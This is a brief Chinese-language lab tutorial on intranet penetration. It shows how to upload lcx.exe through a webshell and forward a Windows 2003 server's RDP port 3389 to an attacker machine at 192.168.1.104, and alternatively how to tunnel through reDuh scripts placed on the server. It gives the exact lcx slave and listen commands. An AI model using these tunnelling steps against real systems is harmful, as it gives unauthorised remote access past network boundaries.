一、环境:
1、内网主机IP:192.168.1.106 win2003
2、假设外网主机ip:192.168.1.104 win7
二、通过大马上传lcx.exe到服务器内网
1、将内网3389端口转发到外网2222端口
lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389
2、在攻击机win7监听2222本地端口,转发到4444端口
lcx.exe -listen 2222 4444
3、在攻击机win7中远程连接
三、利用工具转发reDuh
1、将软件自带的脚本拷贝到服务器中,根据不同环境,选择不同脚本
2、打开reDuh,将脚本文件上传的路径填写到URL,点击start,再点击create
3、打开远程连接,这个有点缓慢,但是可以连接成功的,详细见视频教程